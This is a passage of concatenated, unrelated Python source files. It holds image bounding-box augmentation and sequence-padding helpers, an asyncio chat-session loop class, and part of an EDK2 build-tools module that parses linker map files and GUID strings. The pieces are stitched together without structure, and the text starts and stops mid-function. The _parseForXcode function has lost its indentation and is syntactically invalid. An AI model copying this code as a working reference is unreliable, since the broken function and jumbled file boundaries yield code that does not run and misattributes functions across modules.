    thresh_wh2 : float
        Threshold, remove the box if its ratio of width to height or vice verse higher than the threshold.

    Returns
    -------
    numpy.array
        A processed image
    list of int
        A list of classes
    list of list of 4 numbers
        A list of new bounding boxes.

    Raises
    ------
    AssertionError
        If ``wrg`` or ``hrg`` is outside the open interval (0, 1), or a
        coordinate does not have exactly 4 values.

    """
    if classes is None:
        classes = []
    if coords is None:
        coords = []

    imh, imw = im.shape[row_index], im.shape[col_index]
    # BUG FIX: the original guard used `and`, forming an impossible
    # conjunction (hrg >= 1 AND hrg <= 0 ...) that could never fire, so
    # invalid shift ranges were silently accepted. Enforce the documented
    # open interval (0, 1) for both ranges.
    if (hrg >= 1.0) or (hrg <= 0.) or (wrg >= 1.0) or (wrg <= 0.):
        raise AssertionError("shift range should be (0, 1)")

    if is_random:
        tx = np.random.uniform(-hrg, hrg) * imh
        ty = np.random.uniform(-wrg, wrg) * imw
    else:
        tx, ty = hrg * imh, wrg * imw
    translation_matrix = np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]])

    transform_matrix = translation_matrix  # no need to do offset
    im_new = apply_transform(im, transform_matrix, channel_index, fill_mode, cval, order)

    # modified from obj_box_crop
    def _get_coord(coord):
        """Input pixel-unit [x, y, w, h] format, then make sure [x, y] it is the up-left coordinates,
        before getting the new coordinates.
        Boxes outsides the cropped image will be removed.

        """
        if is_center:
            # normalise to up-left format so the clipping below is uniform
            coord = obj_box_coord_centroid_to_upleft(coord)

        ##======= pixel unit format and upleft, w, h ==========##
        # translate the box by the same shift applied to the pixels
        x = coord[0] - ty  # only change this
        y = coord[1] - tx  # only change this
        w = coord[2]
        h = coord[3]

        if x < 0:
            if x + w <= 0:
                return None  # box shifted entirely off the left edge
            w = w + x
            x = 0
        elif x > im_new.shape[1]:  # object outside the cropped image
            return None

        if y < 0:
            if y + h <= 0:
                return None  # box shifted entirely off the top edge
            h = h + y
            y = 0
        elif y > im_new.shape[0]:  # object outside the cropped image
            return None

        if (x is not None) and (x + w > im_new.shape[1]):  # box outside the cropped image
            w = im_new.shape[1] - x

        if (y is not None) and (y + h > im_new.shape[0]):  # box outside the cropped image
            h = im_new.shape[0] - y

        # drop degenerate boxes: extreme aspect ratio ...
        if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2):  # object shape strange: too narrow
            # tl.logging.info('xx', w, h)
            return None

        # ... or too small relative to the shifted image
        if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
                                                        thresh_wh):  # object shape strange: too narrow
            # tl.logging.info('yy', w, im_new.shape[1], h, im_new.shape[0])
            return None

        coord = [x, y, w, h]

        ## convert back if input format is center.
        if is_center:
            coord = obj_box_coord_upleft_to_centroid(coord)

        return coord

    coords_new = list()
    classes_new = list()
    for i, _ in enumerate(coords):
        coord = coords[i]

        if len(coord) != 4:
            raise AssertionError("coordinate should be 4 values : [x, y, w, h]")

        if is_rescale:
            # for scaled coord, upscaled before process and scale back in the end.
            coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
            coord = _get_coord(coord)
            if coord is not None:
                coord = obj_box_coord_rescale(coord, im_new.shape)
                coords_new.append(coord)
                classes_new.append(classes[i])
        else:
            coord = _get_coord(coord)
            if coord is not None:
                coords_new.append(coord)
                classes_new.append(classes[i])
    return im_new, classes_new, coords_new
def obj_box_zoom(
        im, classes=None, coords=None, zoom_range=(0.9,
                                                   1.1), row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
        cval=0., order=1, is_rescale=False, is_center=False, is_random=False, thresh_wh=0.02, thresh_wh2=12.
):
    """Zoom in and out of a single image, randomly or non-randomly, and compute the new bounding box coordinates.
    Objects outside the cropped image will be removed.

    Parameters
    -----------
    im : numpy.array
        An image with dimension of [row, col, channel] (default).
    classes : list of int or None
        Class IDs.
    coords : list of list of 4 int/float or None
        Coordinates [[x, y, w, h], [x, y, w, h], ...].
    zoom_range row_index col_index channel_index is_random fill_mode cval and order : see ``tl.prepro.zoom``.
    is_rescale : boolean
        Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
    is_center : boolean
        Set to True, if the x and y of coordinates are the centroid. (i.e. darknet format). Default is False.
    thresh_wh : float
        Threshold, remove the box if its ratio of width(height) to image size less than the threshold.
    thresh_wh2 : float
        Threshold, remove the box if its ratio of width to height or vice verse higher than the threshold.

    Returns
    -------
    numpy.array
        A processed image
    list of int
        A list of classes
    list of list of 4 numbers
        A list of new bounding boxes.

    """
    if classes is None:
        classes = []
    if coords is None:
        coords = []

    if len(zoom_range) != 2:
        raise Exception('zoom_range should be a tuple or list of two floats. ' 'Received arg: ', zoom_range)
    if is_random:
        if zoom_range[0] == 1 and zoom_range[1] == 1:
            zx, zy = 1, 1
            tl.logging.info(" random_zoom : not zoom in/out")
        else:
            # one independent random factor per axis
            zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
    else:
        zx, zy = zoom_range
    # tl.logging.info(zx, zy)
    # zx occupies the row slot and zy the column slot of the zoom matrix
    zoom_matrix = np.array([[zx, 0, 0], [0, zy, 0], [0, 0, 1]])

    h, w = im.shape[row_index], im.shape[col_index]
    # centre the zoom on the middle of the image rather than the origin
    transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
    im_new = apply_transform(im, transform_matrix, channel_index, fill_mode, cval, order)

    # modified from obj_box_crop
    def _get_coord(coord):
        """Input pixel-unit [x, y, w, h] format, then make sure [x, y] it is the up-left coordinates,
        before getting the new coordinates.
        Boxes outsides the cropped image will be removed.

        """
        if is_center:
            # normalise to up-left format so the clipping below is uniform
            coord = obj_box_coord_centroid_to_upleft(coord)

        # ======= pixel unit format and upleft, w, h ==========
        # Zoom each box about the image centre. NOTE(review): x/w divide by
        # zy and y/h by zx — this pairing mirrors the zoom matrix above,
        # where zx sits in the row (y) slot and zy in the column (x) slot;
        # confirm against apply_transform's axis convention.
        x = (coord[0] - im.shape[1] / 2) / zy + im.shape[1] / 2  # only change this
        y = (coord[1] - im.shape[0] / 2) / zx + im.shape[0] / 2  # only change this
        w = coord[2] / zy  # only change this
        h = coord[3] / zx  # only change this
        if x < 0:
            if x + w <= 0:
                return None  # box zoomed entirely off the left edge
            w = w + x
            x = 0
        elif x > im_new.shape[1]:  # object outside the cropped image
            return None

        if y < 0:
            if y + h <= 0:
                return None  # box zoomed entirely off the top edge
            h = h + y
            y = 0
        elif y > im_new.shape[0]:  # object outside the cropped image
            return None

        if (x is not None) and (x + w > im_new.shape[1]):  # box outside the cropped image
            w = im_new.shape[1] - x

        if (y is not None) and (y + h > im_new.shape[0]):  # box outside the cropped image
            h = im_new.shape[0] - y

        # drop degenerate boxes: extreme aspect ratio ...
        if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2):  # object shape strange: too narrow
            # tl.logging.info('xx', w, h)
            return None

        # ... or too small relative to the zoomed image
        if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
                                                        thresh_wh):  # object shape strange: too narrow
            # tl.logging.info('yy', w, im_new.shape[1], h, im_new.shape[0])
            return None

        coord = [x, y, w, h]

        # convert back if input format is center.
        if is_center:
            coord = obj_box_coord_upleft_to_centroid(coord)

        return coord

    coords_new = list()
    classes_new = list()
    for i, _ in enumerate(coords):
        coord = coords[i]

        if len(coord) != 4:
            raise AssertionError("coordinate should be 4 values : [x, y, w, h]")

        if is_rescale:
            # for scaled coord, upscaled before process and scale back in the end.
            coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
            coord = _get_coord(coord)
            if coord is not None:
                coord = obj_box_coord_rescale(coord, im_new.shape)
                coords_new.append(coord)
                classes_new.append(classes[i])
        else:
            coord = _get_coord(coord)
            if coord is not None:
                coords_new.append(coord)
                classes_new.append(classes[i])
    return im_new, classes_new, coords_new
def pad_sequences(sequences, maxlen=None, dtype='int32', padding='post', truncating='pre', value=0.):
    """Pad each sequence to the same length.

    By default every sequence is padded to the length of the longest one.
    When ``maxlen`` is given, any longer sequence is truncated to ``maxlen``
    (from the beginning by default). Both pre- and post- padding/truncating
    are supported; the default is post-padding with pre-truncating.

    Parameters
    ----------
    sequences : list of list of int
        All sequences where each row is a sequence.
    maxlen : int
        Maximum length.
    dtype : numpy.dtype or str
        Data type to cast the resulting sequence.
    padding : str
        Either 'pre' or 'post', pad either before or after each sequence.
    truncating : str
        Either 'pre' or 'post', remove values from sequences larger than maxlen either
        in the beginning or in the end of the sequence.
    value : float
        Value to pad the sequences to the desired value.

    Returns
    ----------
    list of list
        The padded sequences with dimensions (number_of_sequences, maxlen),
        converted back to nested Python lists via ``tolist()``.

    Raises
    ------
    ValueError
        If ``padding`` or ``truncating`` is neither 'pre' nor 'post', or if a
        truncated sample's trailing shape differs from the other samples.

    Examples
    ----------
    >>> sequences = [[1,1,1,1,1],[2,2,2],[3,3]]
    >>> sequences = pad_sequences(sequences, maxlen=None, dtype='int32',
    ...          padding='post', truncating='pre', value=0.)
    [[1 1 1 1 1]
     [2 2 2 0 0]
     [3 3 0 0 0]]

    """
    num_samples = len(sequences)
    if maxlen is None:
        maxlen = max(len(seq) for seq in sequences)

    # Trailing sample shape is taken from the first non-empty sequence;
    # consistency with the remaining sequences is checked in the loop below.
    sample_shape = tuple()
    for seq in sequences:
        if len(seq) > 0:
            sample_shape = np.asarray(seq).shape[1:]
            break

    def _truncated(seq):
        # Cut `seq` down to at most `maxlen` entries, dropping from the
        # requested side.
        if truncating == 'pre':
            return seq[-maxlen:]
        if truncating == 'post':
            return seq[:maxlen]
        raise ValueError('Truncating type "%s" not understood' % truncating)

    # start from a buffer filled with the pad value, then overwrite per row
    padded = (np.ones((num_samples, maxlen) + sample_shape) * value).astype(dtype)
    for idx, seq in enumerate(sequences):
        if len(seq) == 0:
            continue  # empty list was found
        trunc = np.asarray(_truncated(seq), dtype=dtype)
        if trunc.shape[1:] != sample_shape:
            raise ValueError(
                'Shape of sample %s of sequence at position %s is different from expected shape %s' %
                (trunc.shape[1:], idx, sample_shape)
            )

        if padding == 'post':
            padded[idx, :len(trunc)] = trunc
        elif padding == 'pre':
            padded[idx, -len(trunc):] = trunc
        else:
            raise ValueError('Padding type "%s" not understood' % padding)
    return padded.tolist()
def remove_pad_sequences(sequences, pad_id=0):
    """Remove trailing padding from each sequence.

    Parameters
    -----------
    sequences : list of list of int
        All sequences where each row is a sequence.
    pad_id : int
        The pad ID.

    Returns
    ----------
    list of list of int
        The processed sequences.

    Examples
    ----------
    >>> sequences = [[2,3,4,0,0], [5,1,2,3,4,0,0,0], [4,5,0,2,4,0,0,0]]
    >>> print(remove_pad_sequences(sequences, pad_id=0))
    [[2, 3, 4], [5, 1, 2, 3, 4], [4, 5, 0, 2, 4]]

    """
    sequences_out = copy.deepcopy(sequences)
    for i, seq in enumerate(sequences):
        # Scan from the right for the last non-pad token and keep everything
        # up to (and including) it.
        # BUG FIX: the original sliced with `[0:-j + 1]`, which for j == 1
        # (no trailing padding at all) evaluates to `[0:0]` and wiped the
        # whole sequence; its range also stopped before the first element,
        # so fully-padded sequences were returned unchanged.
        for j in range(1, len(seq) + 1):
            if seq[-j] != pad_id:
                sequences_out[i] = sequences_out[i][:len(seq) - j + 1]
                break
        else:
            # every token is pad_id (or the sequence is empty)
            sequences_out[i] = []
    return sequences_out
def process_sequences(sequences, end_id=0, pad_val=0, is_shorten=True, remain_end_id=False):
    """Replace everything from the END token onwards with the pad value, then
    optionally shorten every sequence to the longest remaining length in the batch.

    Parameters
    -----------
    sequences : list of list of int
        All sequences where each row is a sequence.
    end_id : int
        The special token for END.
    pad_val : int
        Replace the `end_id` and the IDs after `end_id` with this value.
    is_shorten : boolean
        Shorten the sequences. Default is True.
    remain_end_id : boolean
        Keep an `end_id` in the end. Default is False.

    Returns
    ----------
    list of list of int
        The processed sequences (modified in place and returned).

    Examples
    ---------
    >>> sentences_ids = [[4, 3, 5, 3, 2, 2, 2, 2],  <-- end_id is 2
    ...                  [5, 3, 9, 4, 9, 2, 2, 3]]  <-- end_id is 2
    >>> sentences_ids = process_sequences(sentences_ids, end_id=2, pad_val=0, is_shorten=True)
    [[4, 3, 5, 3, 0], [5, 3, 9, 4, 9]]
    """
    longest = 0
    for seq in sequences:
        seen_end = False
        for pos, token in enumerate(seq):
            if seen_end:
                # Everything after the first END token becomes padding.
                seq[pos] = pad_val
            elif token == end_id:
                # First END token in this sequence.
                seen_end = True
                if longest < pos:
                    longest = pos
                if not remain_end_id:
                    seq[pos] = pad_val
    if remain_end_id:
        longest += 1
    if is_shorten:
        for idx, seq in enumerate(sequences):
            sequences[idx] = seq[:longest]
    return sequences
def sequences_add_start_id(sequences, start_id=0, remove_last=False):
    """Prepend a special start token (id) to every sequence.

    Parameters
    ------------
    sequences : list of list of int
        All sequences where each row is a sequence.
    start_id : int
        The start ID.
    remove_last : boolean
        Drop the last value of each sequence (usually the end ID) so the
        sequence length is preserved.

    Returns
    ----------
    list of list of int
        The processed sequences (new lists; the input is not modified).

    Examples
    ---------
    >>> sentences_ids = [[4,3,5,3,2,2,2,2], [5,3,9,4,9,2,2,3]]
    >>> sequences_add_start_id(sentences_ids, start_id=2)
    [[2, 4, 3, 5, 3, 2, 2, 2, 2], [2, 5, 3, 9, 4, 9, 2, 2, 3]]
    >>> sequences_add_start_id(sentences_ids, start_id=2, remove_last=True)
    [[2, 4, 3, 5, 3, 2, 2, 2], [2, 5, 3, 9, 4, 9, 2, 2]]

    For Seq2seq

    >>> input = [a, b, c]
    >>> target = [x, y, z]
    >>> decode_seq = [start_id, a, b] <-- sequences_add_start_id(input, start_id, True)
    """
    sequences_out = []
    for seq in sequences:
        tail = seq[:-1] if remove_last else seq
        sequences_out.append([start_id] + tail)
    return sequences_out
def sequences_add_end_id(sequences, end_id=888):
    """Append a special end token (id) to every sequence.

    Parameters
    -----------
    sequences : list of list of int
        All sequences where each row is a sequence.
    end_id : int
        The end ID.

    Returns
    ----------
    list of list of int
        The processed sequences (new lists; the input is not modified).

    Examples
    ---------
    >>> sequences = [[1,2,3],[4,5,6,7]]
    >>> print(sequences_add_end_id(sequences, end_id=999))
    [[1, 2, 3, 999], [4, 5, 6, 999]]
    """
    # Concatenation builds a fresh list per row, matching the original's
    # copy-then-append behavior.
    return [seq + [end_id] for seq in sequences]
def sequences_add_end_id_after_pad(sequences, end_id=888, pad_id=0):
    """Write a special end token (id) over the FIRST pad position of each sequence.

    Sequences that contain no pad token (already full) are returned unchanged.

    Parameters
    -----------
    sequences : list of list of int
        All sequences where each row is a sequence.
    end_id : int
        The end ID.
    pad_id : int
        The pad ID.

    Returns
    ----------
    list of list of int
        The processed sequences (the input is not modified).

    Examples
    ---------
    >>> sequences = [[1,2,0,0], [1,2,3,0], [1,2,3,4]]
    >>> print(sequences_add_end_id_after_pad(sequences, end_id=99, pad_id=0))
    [[1, 2, 99, 0], [1, 2, 3, 99], [1, 2, 3, 4]]
    """
    # Deep copy so the caller's lists are left untouched.
    sequences_out = copy.deepcopy(sequences)
    for i, seq in enumerate(sequences):
        for j, token in enumerate(seq):
            if token == pad_id:
                # Overwrite only the FIRST pad token, then move on to the
                # next sequence.
                sequences_out[i][j] = end_id
                break
    return sequences_out
def sequences_get_mask(sequences, pad_val=0):
    """Return a 0/1 mask for a batch of sequences: trailing padding is 0,
    everything else (including interior pad values) is 1.

    Parameters
    -----------
    sequences : list of list of int
        All sequences where each row is a sequence.
    pad_val : int
        The pad value.

    Returns
    ----------
    numpy.ndarray
        The mask, same shape as `sequences`.

    Examples
    ---------
    >>> sentences_ids = [[4, 0, 5, 3, 0, 0],
    ...                  [5, 3, 9, 4, 9, 0]]
    >>> mask = sequences_get_mask(sentences_ids, pad_val=0)
    [[1 1 1 1 0 0]
     [1 1 1 1 1 0]]
    """
    mask = np.ones_like(sequences)
    for row, seq in enumerate(sequences):
        # Walk backwards from the end: zero out pad values until the first
        # real token, which ends the trailing-padding run for this row.
        for col in range(len(seq) - 1, -1, -1):
            if seq[col] != pad_val:
                break
            mask[row, col] = 0
    return mask
|
loop.py | import os
import asyncio
import threading
from . import session
class ChatLoop(object):
    """
    Responsible for creating an `asyncio` event loop in a background thread
    that chat sessions can share and for creating new chat sessions connected
    to that thread and event loop.
    """

    def __init__(self, host=None, port=None):
        # Connection details may be supplied here or later via one of the
        # init*() methods below.
        self.__host = host
        self.__port = port

    # Flask integration -- see app/__init__.py
    def init_app(self, app):
        # Pull the chat server host/port from the Flask application config.
        self.init(app.config['CHAT_HOST'], app.config['CHAT_PORT'])

    def init(self, host, port):
        # Record (or overwrite) the connection details used by new_session().
        self.__host = host
        self.__port = port

    def init_from_env(self):
        # NOTE(review): os.environ values are strings, so CHAT_PORT is passed
        # on un-converted -- presumably session.ChatSession accepts a string
        # port. TODO confirm.
        self.init(os.environ['CHAT_HOST'], os.environ['CHAT_PORT'])

    def __run_event_loop(self):
        """ Runs in a background thread """
        asyncio.set_event_loop(self.__loop)
        self.__loop.run_forever()

    # Class-level defaults; new_session() assigns instance attributes on
    # first use.  The lock serializes the lazy start-up of the background
    # thread/loop across concurrent new_session() callers.
    __loop = None
    __new_session_lock = threading.Lock()
    __thread = None

    def new_session(self) -> session.ChatSession:
        """
        Open a new session connected to the chat server using
        connection details provided at initialization time.
        """
        # On the first time, start the background thread and event loop
        with self.__new_session_lock:
            if self.__loop is None:
                self.__loop = asyncio.new_event_loop()
                self.__thread = threading.Thread(target=self.__run_event_loop)
                self.__thread.start()
        # Return a new session
        s = session.ChatSession(
            self.__host,
            self.__port,
            self.__loop)
        return s

    def stop(self):
        # Ask the loop to stop from its own thread (call_soon_threadsafe is
        # the only safe way to poke a loop owned by another thread), then
        # wait for the background thread to exit.
        if self.__loop is not None:
            self.__loop.call_soon_threadsafe(self.__loop.stop)
        if self.__thread is not None:
            self.__thread.join()
Misc.py | ## @file
# Common routines used by all tools
#
# Copyright (c) 2007 - 2017, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import sys
import string
import thread
import threading
import time
import re
import cPickle
import array
import shutil
from struct import pack
from UserDict import IterableUserDict
from UserList import UserList
from Common import EdkLogger as EdkLogger
from Common import GlobalData as GlobalData
from DataType import *
from BuildToolError import *
from CommonDataClass.DataClass import *
from Parsing import GetSplitValueList
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import uuid
from CommonDataClass.Exceptions import BadExpression
## Regular expression used to find out place holders in string template
#  (matches ${name}; used by the TemplateString machinery below)
gPlaceholderPattern = re.compile("\$\{([^$()\s]+)\}", re.MULTILINE | re.UNICODE)

## Dictionary used to store file time stamp for quick re-access
#  (maintained by IsChanged)
gFileTimeStampCache = {}    # {file path : file time stamp}

## Dictionary used to store dependencies of files
gDependencyDatabase = {}    # arch : {file path : [dependent files list]}
def GetVariableOffset(mapfilepath, efifilepath, varnames):
    """ Parse map file to get variable offset in current EFI file

    @param mapfilepath    Map file absolute path
    @param efifilepath:   EFI binary file full path
    @param varnames       iterable container whose elements are variable names to be searched

    @return List whose elements are tuples of (variable name, raw offset),
            or None if the map file cannot be read or is empty
    """
    try:
        # 'with' guarantees the handle is closed even if readlines() fails;
        # the original left the file open on a read error.
        with open(mapfilepath, 'r') as f:
            lines = f.readlines()
    except (IOError, OSError):
        return None

    if not lines:
        return None
    # Dispatch on the map file's first line, which identifies the linker.
    firstline = lines[0].strip()
    if (firstline.startswith("Archive member included ") and
        firstline.endswith(" file (symbol)")):
        return _parseForGCC(lines, efifilepath, varnames)
    if firstline.startswith("# Path:"):
        return _parseForXcode(lines, efifilepath, varnames)
    return _parseGeneral(lines, efifilepath, varnames)
def _parseForXcode(lines, efifilepath, varnames):
status = 0
ret = []
for index, line in enumerate(lines):
line = line.strip()
if status == 0 and line == "# Symbols:":
status = 1
continue
if status == 1 and len(line) != 0:
for varname in varnames:
if varname in line:
m = re.match('^([\da-fA-FxX]+)([\s\S]*)([_]*%s)$' % varname, line)
if m != None:
ret.append((varname, m.group(1)))
return ret
def _parseForGCC(lines, efifilepath, varnames):
    """ Parse map file generated by GCC linker """
    # State machine: 0 = prologue, 1 = saw "Memory Configuration",
    # 2 = saw "Linker script and memory map", 3 = inside "START GROUP",
    # which is the section/symbol listing actually parsed below.
    status = 0
    sections = []
    varoffset = []
    for index, line in enumerate(lines):
        line = line.strip()
        # status machine transection
        if status == 0 and line == "Memory Configuration":
            status = 1
            continue
        elif status == 1 and line == 'Linker script and memory map':
            status = 2
            continue
        elif status ==2 and line == 'START GROUP':
            status = 3
            continue

        # status handler
        if status == 3:
            # Section line: "<name> <address> <size>"; remember every one so
            # the most recent (sections[-1]) is the section a symbol lives in.
            m = re.match('^([\w_\.]+) +([\da-fA-Fx]+) +([\da-fA-Fx]+)$', line)
            if m != None:
                sections.append(m.groups(0))
            for varname in varnames:
                Str = ''
                m = re.match("^.data.(%s)" % varname, line)
                if m != None:
                    m = re.match(".data.(%s)$" % varname, line)
                    if m != None:
                        # Symbol name fills the whole line: the address/size
                        # pair is on the following line.
                        Str = lines[index + 1]
                    else:
                        Str = line[len(".data.%s" % varname):]
                    if Str:
                        m = re.match('^([\da-fA-Fx]+) +([\da-fA-Fx]+)', Str.strip())
                        if m != None:
                            # (name, symbol address, enclosing-section base, section name)
                            varoffset.append((varname, int(m.groups(0)[0], 16) , int(sections[-1][1], 16), sections[-1][0]))

    if not varoffset:
        return []
    # get section information from efi file
    efisecs = PeImageClass(efifilepath).SectionHeaderList
    if efisecs == None or len(efisecs) == 0:
        return []
    #redirection
    # Difference between the map file's .text base and the EFI image's,
    # used to translate map addresses into image offsets.
    redirection = 0
    for efisec in efisecs:
        for section in sections:
            if section[0].strip() == efisec[0].strip() and section[0].strip() == '.text':
                redirection = int(section[1], 16) - efisec[1]
    ret = []
    for var in varoffset:
        for efisec in efisecs:
            # var[1] is the symbol address; find the EFI section containing it
            if var[1] >= efisec[1] and var[1] < efisec[1]+efisec[3]:
                ret.append((var[0], hex(efisec[2] + var[1] - efisec[1] - redirection)))
    return ret
def _parseGeneral(lines, efifilepath, varnames):
    """ Parse a map file in the generic (MSVC-style) format. """
    status = 0    #0 - beginning of file; 1 - PE section definition; 2 - symbol table
    secs = []    # key = section name
    varoffset = []
    # Section line:  "<no>:<start> <length>H <name> <class>"
    secRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\da-fA-F]+)[Hh]? +([.\w\$]+) +(\w+)', re.UNICODE)
    # Symbol line:   "<no>:<offset> <name> <virtual address>"
    symRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\.:\\\\\w\?@\$]+) +([\da-fA-F]+)', re.UNICODE)
    for line in lines:
        line = line.strip()
        # The three headers below switch the parser between table states.
        if re.match("^Start[' ']+Length[' ']+Name[' ']+Class", line):
            status = 1
            continue
        if re.match("^Address[' ']+Publics by Value[' ']+Rva\+Base", line):
            status = 2
            continue
        if re.match("^entry point at", line):
            status = 3
            continue
        if status == 1 and len(line) != 0:
            m = secRe.match(line)
            assert m != None, "Fail to parse the section in map file , line is %s" % line
            sec_no, sec_start, sec_length, sec_name, sec_class = m.groups(0)
            secs.append([int(sec_no, 16), int(sec_start, 16), int(sec_length, 16), sec_name, sec_class])
        if status == 2 and len(line) != 0:
            for varname in varnames:
                m = symRe.match(line)
                assert m != None, "Fail to parse the symbol in map file, line is %s" % line
                sec_no, sym_offset, sym_name, vir_addr = m.groups(0)
                sec_no = int(sec_no, 16)
                sym_offset = int(sym_offset, 16)
                vir_addr = int(vir_addr, 16)
                # Symbol names may carry leading underscores (C decoration).
                m2 = re.match('^[_]*(%s)' % varname, sym_name)
                if m2 != None:
                    # fond a binary pcd entry in map file
                    for sec in secs:
                        # Match the symbol to the section whose range contains it.
                        if sec[0] == sec_no and (sym_offset >= sec[1] and sym_offset < sec[1] + sec[2]):
                            varoffset.append([varname, sec[3], sym_offset, vir_addr, sec_no])
    if not varoffset: return []
    # get section information from efi file
    efisecs = PeImageClass(efifilepath).SectionHeaderList
    if efisecs == None or len(efisecs) == 0:
        return []
    ret = []
    for var in varoffset:
        index = 0
        for efisec in efisecs:
            index = index + 1
            # Prefer a name match; fall back to matching the section number.
            if var[1].strip() == efisec[0].strip():
                ret.append((var[0], hex(efisec[2] + var[2])))
            elif var[4] == index:
                ret.append((var[0], hex(efisec[2] + var[2])))
    return ret
## Routine to process duplicated INF
#
#  This function is called by following two cases:
#  Case 1 in DSC:
#    [components.arch]
#    Pkg/module/module.inf
#    Pkg/module/module.inf {
#      <Defines>
#        FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836
#    }
#  Case 2 in FDF:
#    INF Pkg/module/module.inf
#    INF FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836 Pkg/module/module.inf
#
#  This function copies Pkg/module/module.inf to
#  Conf/.cache/0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf
#
#  @param  Path     Original PathClass object
#  @param  BaseName New file base name
#
#  @retval return the new PathClass object
#
def ProcessDuplicatedInf(Path, BaseName, Workspace):
    # New file name = FILE_GUID + original base name (+ original extension)
    Filename = os.path.split(Path.File)[1]
    if '.' in Filename:
        Filename = BaseName + Path.BaseName + Filename[Filename.rfind('.'):]
    else:
        Filename = BaseName + Path.BaseName

    #
    # If -N is specified on command line, cache is disabled
    # The directory has to be created
    #
    DbDir = os.path.split(GlobalData.gDatabasePath)[0]
    if not os.path.exists(DbDir):
        os.makedirs(DbDir)
    #
    # A temporary INF is copied to database path which must have write permission
    # The temporary will be removed at the end of build
    # In case of name conflict, the file name is
    # FILE_GUIDBaseName (0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf)
    #
    TempFullPath = os.path.join(DbDir,
                                Filename)
    RtPath = PathClass(Path.File, Workspace)
    #
    # Modify the full path to temporary path, keep other unchanged
    #
    # To build same module more than once, the module path with FILE_GUID overridden has
    # the file name FILE_GUIDmodule.inf, but the relative path (self.MetaFile.File) is the real path
    # in DSC which is used as relative path by C files and other files in INF.
    # A trick was used: all module paths are PathClass instances, after the initialization
    # of PathClass, the PathClass.Path is overridden by the temporary INF path.
    #
    # The reason for creating a temporary INF is:
    # Platform.Modules which is the base to create ModuleAutoGen objects is a dictionary,
    # the key is the full path of INF, the value is an object to save overridden library instances, PCDs.
    # A different key for the same module is needed to create different output directory,
    # retrieve overridden PCDs, library instances.
    #
    # The BaseName is the FILE_GUID which is also the output directory name.
    #
    #
    RtPath.Path = TempFullPath
    RtPath.BaseName = BaseName
    #
    # If file exists, compare contents
    #
    if os.path.exists(TempFullPath):
        with open(str(Path), 'rb') as f1: Src = f1.read()
        with open(TempFullPath, 'rb') as f2: Dst = f2.read()
        if Src == Dst:
            # Identical content: reuse the existing temporary INF as-is.
            return RtPath
    # Record the copy so ClearDuplicatedInf() can remove it after the build.
    GlobalData.gTempInfs.append(TempFullPath)
    shutil.copy2(str(Path), TempFullPath)
    return RtPath
## Remove temporary created INFs whose paths were saved in gTempInfs
#
def ClearDuplicatedInf():
    """Delete every temporary INF recorded in GlobalData.gTempInfs."""
    for TempInf in GlobalData.gTempInfs:
        if os.path.exists(TempInf):
            os.remove(TempInf)
## callback routine for processing variable option
#
# This function can be used to process variable number of option values. The
# typical usage of it is specify architecure list on command line.
# (e.g. <tool> -a IA32 X64 IPF)
#
# @param  Option        Standard callback function parameter
# @param  OptionString  Standard callback function parameter
# @param  Value         Standard callback function parameter
# @param  Parser        Standard callback function parameter
#
# @retval
#
def ProcessVariableArgument(Option, OptionString, Value, Parser):
    assert Value is None
    Collected = []
    # Consume remaining arguments until the next option switch.
    while Parser.rargs:
        Next = Parser.rargs[0]
        # "--xyz" (long option) stops collection; a bare "--" does not.
        if Next[:2] == "--" and len(Next) > 2:
            break
        # "-x" (short option) stops collection; a lone "-" does not.
        if Next[:1] == "-" and len(Next) > 1 and Next[1] != "-":
            break
        Collected.append(Next)
        del Parser.rargs[0]
    setattr(Parser.values, Option.dest, Collected)
## Convert GUID string in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx style to C structure style
#
#   @param      Guid    The GUID string
#
#   @retval     string  The GUID string in C structure style
#
def GuidStringToGuidStructureString(Guid):
    Parts = Guid.split('-')
    # First three registry-format fields map directly to the first three
    # C-structure members.
    Head = ''.join('0x%s, ' % Parts[Index] for Index in range(3))
    # The remaining 8 bytes come from fields 4 (2 bytes) and 5 (6 bytes).
    Tail = ['0x' + Parts[3][0:2], '0x' + Parts[3][2:4]]
    for Offset in range(0, 12, 2):
        Tail.append('0x' + Parts[4][Offset:Offset + 2])
    return '{' + Head + '{' + ', '.join(Tail) + '}}'
## Convert GUID structure in byte array to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
#   @param      GuidValue   The GUID value in byte array
#
#   @retval     string      The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format,
#                           or '' if the input is malformed
#
def GuidStructureByteArrayToGuidString(GuidValue):
    guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
    guidValueList = guidValueString.split(",")
    if len(guidValueList) != 16:
        return ''
    try:
        # Bytes 0-3 are little-endian Data1, 4-5 Data2, 6-7 Data3, 8-15
        # Data4 -- hence the reversed indices for the first three fields.
